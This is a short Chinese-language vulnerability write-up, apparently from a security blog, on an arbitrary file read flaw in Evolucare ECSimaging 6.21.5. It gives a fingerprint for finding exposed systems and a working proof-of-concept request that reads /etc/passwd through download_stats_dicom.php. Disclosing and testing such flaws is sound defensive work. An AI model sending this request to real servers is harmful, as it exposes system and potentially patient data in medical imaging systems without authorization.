Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞

漏洞描述

Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等。

漏洞影响

EVOLUCARE Evolucare Ecsimaging 6.21.5

网络测绘

body=”ECSimaging”

漏洞复现

登录页面

20240412105104589-1645546475187-0a083488-f138-4905-97d4-d59cffe9d11c.2ee9f7a8_2024-04-12_10-50-43 (1)

验证POC

/download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd

20240412105317686-png (4)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容